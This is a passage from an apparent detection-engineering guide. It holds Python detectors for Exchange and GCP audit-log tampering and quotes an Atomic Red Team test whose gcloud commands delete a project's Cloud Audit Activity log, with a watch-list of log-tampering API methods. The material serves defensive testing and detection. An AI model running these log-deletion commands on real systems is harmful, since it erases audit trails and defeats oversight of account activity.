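    """Flatten the Parameters list into {lower-case name: raw string value}."""
    return {p["Name"].lower(): str(p.get("Value", ""))
            for p in record.get("Parameters", [])}


def as_bool(value):
    """Parse the string forms seen in Exchange records ("False", "$false", "0")."""
    if value is None:
        return None
    text = value.strip().lstrip("$").lower()
    if text in {"true", "1"}:
        return True
    if text in {"false", "0"}:
        return False
    return None


def evaluate(record):
    """Return a finding for one audit record, or None when it is benign."""
    op = record.get("Operation", "")
    params = parameters(record)
    actor = record.get("UserId", "unknown")
    mailbox = params.get("identity", record.get("ObjectId", "unknown"))
    if op == "Set-AdminAuditLogConfig" and as_bool(params.get("unifiedauditlogingestionenabled")) is False:
        return {"rule": "unified-audit-log-ingestion-disabled", "actor": actor, "target": "tenant"}
    if op == "Set-MailboxAuditBypassAssociation" and as_bool(params.get("auditbypassenabled")) is True:
        return {"rule": "mailbox-audit-bypass-enabled", "actor": actor, "target": mailbox}
    if op == "Set-Mailbox" and as_bool(params.get("auditenabled")) is False:
        return {"rule": "mailbox-audit-logging-disabled", "actor": actor, "target": mailbox}
    return None


def scan(records):
    """Evaluate a batch of records and keep only the findings."""
    return [f for f in map(evaluate, records) if f]


ADMIN = "admin@contoso.example"  # placeholder
SAMPLE_RECORDS = [  # constructed
    {"RecordType": 1, "Workload": "Exchange", "Operation": "Set-AdminAuditLogConfig", "UserId": ADMIN,
     "Parameters": [{"Name": "UnifiedAuditLogIngestionEnabled", "Value": "False"}]},
    {"RecordType": 1, "Workload": "Exchange", "Operation": "Set-MailboxAuditBypassAssociation",
     "UserId": ADMIN, "ObjectId": "finance-shared@contoso.example",
     "Parameters": [{"Name": "Identity", "Value": "finance-shared@contoso.example"},
                    {"Name": "AuditBypassEnabled", "Value": "True"}]},
    {"RecordType": 1, "Workload": "Exchange", "Operation": "Set-MailboxAuditBypassAssociation",
     "UserId": ADMIN, "ObjectId": "finance-shared@contoso.example",  # the cleanup step: benign
     "Parameters": [{"Name": "Identity", "Value": "finance-shared@contoso.example"},
                    {"Name": "AuditBypassEnabled", "Value": "False"}]},
    {"RecordType": 1, "Workload": "Exchange", "Operation": "Set-Mailbox",
     "UserId": ADMIN, "ObjectId": "ceo@contoso.example",
     "Parameters": [{"Name": "Identity", "Value": "ceo@contoso.example"},
                    {"Name": "AuditEnabled", "Value": "$false"}]},
    {"RecordType": 1, "Workload": "Exchange", "Operation": "Set-Mailbox",  # ordinary change: benign
     "UserId": ADMIN, "ObjectId": "ceo@contoso.example",
     "Parameters": [{"Name": "Identity", "Value": "ceo@contoso.example"},
                    {"Name": "DisplayName", "Value": "Chief Executive"}]},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

The detection depends on the admin audit record being written before ingestion is turned off, so it should be paired with a scheduled posture check: `Get-AdminAuditLogConfig` reports whether `UnifiedAuditLogIngestionEnabled` is still true, and `Get-MailboxAuditBypassAssociation` lists every mailbox whose `AuditBypassEnabled` is set.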
Atomic Test #10 - GCP - Delete Activity Event Log
GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied. An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Denied event logs cannot be deleted.
This Atomic attempts to delete the Activity Event log. An event is generated under the method name google.logging.v2.LoggingServiceV2.DeleteLog with a severity of ERROR.
Supported Platforms: iaas:gcp
auto_generated_guid: d56152ec-01d9-42a2-877c-aac1f6ebe8e6
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
project-id | ID of the GCP project to execute the command against. | string | atomic-project-1 |
Attack Commands: Run with sh!
gcloud config set project #{project-id}
gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet
Dependencies: Run with sh!
Description: Requires gcloud
Check Prereq Commands:
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
Description: Check if user is logged in
Check Prereq Commands:
gcloud config get-value account
Get Prereq Commands:
gcloud auth login --no-launch-browser
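The description of Test #10 gives the detection handle for the GCP case: the call is logged as `google.logging.v2.LoggingServiceV2.DeleteLog` with severity `ERROR`, because the Admin Activity log it targets cannot be deleted. The Python below is an added example, not part of the Atomic Red Team project. Its entries are constructed in the Cloud Logging `LogEntry` shape for audit logs (`protoPayload.methodName`, `protoPayload.resourceName`, `protoPayload.authenticationInfo.principalEmail`, `protoPayload.status.code`, `severity`); the project, principals and the status code on the failed call are placeholders. The `ConfigServiceV2` sink and exclusion methods are related log-routing calls added here; they are not on the page.

```python
"""Detect deletion of Cloud Audit Logs and tampering with log routing in GCP
Cloud Audit Log entries (Test #10 above).

Added example, not from the Atomic Red Team project. Entries are constructed
in the Cloud Logging LogEntry shape for audit logs; the DeleteLog method name
and ERROR severity come from the test description, the ConfigServiceV2 sink and
exclusion methods are related calls added here, and the project, principals and
the status code on the failed call are placeholders.
"""
from urllib.parse import unquote

WATCHED_METHODS = {
    "google.logging.v2.LoggingServiceV2.DeleteLog": "log-deleted",
    "google.logging.v2.ConfigServiceV2.DeleteSink": "log-sink-deleted",
    "google.logging.v2.ConfigServiceV2.UpdateSink": "log-sink-modified",
    "google.logging.v2.ConfigServiceV2.CreateExclusion": "log-exclusion-created",
}
AUDIT_LOG_PREFIX = "/logs/cloudaudit.googleapis.com/"


def evaluate(entry):
    """Return a finding for one LogEntry, or None when the method is benign."""
    payload = entry.get("protoPayload") or {}
    rule = WATCHED_METHODS.get(payload.get("methodName"))
    if rule is None:
        return None
    # Log names arrive URL-encoded (%2F), exactly as in the gcloud command above.
    resource = unquote(payload.get("resourceName", ""))
    return {
        "rule": rule,
        "actor": payload.get("authenticationInfo", {}).get("principalEmail", "unknown"),
        "target": resource,
        "severity": entry.get("severity"),
        # A non-zero google.rpc.Status code means the API refused the call.
        "succeeded": payload.get("status", {}).get("code", 0) == 0,
        "audit_log_targeted": AUDIT_LOG_PREFIX in resource,
    }


def scan(entries):
    """Evaluate a batch of entries and keep only the findings."""
    return [f for f in map(evaluate, entries) if f]


PROJECT = "atomic-project-1"
AUDIT_TYPE = "type.googleapis.com/google.cloud.audit.AuditLog"
SAMPLE_ENTRIES = [  # constructed
    {"severity": "ERROR", "logName": f"projects/{PROJECT}/logs/cloudaudit.googleapis.com%2Factivity",
     "protoPayload": {"@type": AUDIT_TYPE, "serviceName": "logging.googleapis.com",
                      "methodName": "google.logging.v2.LoggingServiceV2.DeleteLog",
                      "resourceName": f"projects/{PROJECT}/logs/cloudaudit.googleapis.com%2Factivity",
                      "authenticationInfo": {"principalEmail": "redatomic@example.com"},
                      "status": {"code": 7, "message": "placeholder: refused"}}},  # code is a placeholder
    {"severity": "NOTICE", "logName": f"projects/{PROJECT}/logs/cloudaudit.googleapis.com%2Factivity",
     "protoPayload": {"@type": AUDIT_TYPE, "serviceName": "logging.googleapis.com",
                      "methodName": "google.logging.v2.LoggingServiceV2.DeleteLog",
                      "resourceName": f"projects/{PROJECT}/logs/app-debug",
                      "authenticationInfo": {"principalEmail": "redatomic@example.com"}}},
    {"severity": "NOTICE", "logName": f"projects/{PROJECT}/logs/cloudaudit.googleapis.com%2Factivity",
     "protoPayload": {"@type": AUDIT_TYPE, "serviceName": "logging.googleapis.com",
                      "methodName": "google.logging.v2.ConfigServiceV2.DeleteSink",
                      "resourceName": f"projects/{PROJECT}/sinks/siem-export",
                      "authenticationInfo": {"principalEmail": "redatomic@example.com"}}},
    {"severity": "INFO", "logName": f"projects/{PROJECT}/logs/cloudaudit.googleapis.com%2Fdata_access",
     "protoPayload": {"@type": AUDIT_TYPE, "serviceName": "logging.googleapis.com",
                      "methodName": "google.logging.v2.ConfigServiceV2.ListSinks",  # benign
                      "resourceName": f"projects/{PROJECT}",
                      "authenticationInfo": {"principalEmail": "auditor@example.com"}}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_ENTRIES):
        print(finding)
```

The first entry reproduces the page's case: the delete fails (`succeeded: False`) yet is still reported with `audit_log_targeted: True`, which is the high-signal combination. The second shows that `DeleteLog` against an ordinary application log is surfaced too, only without that flag, so the consumer can rank it lower.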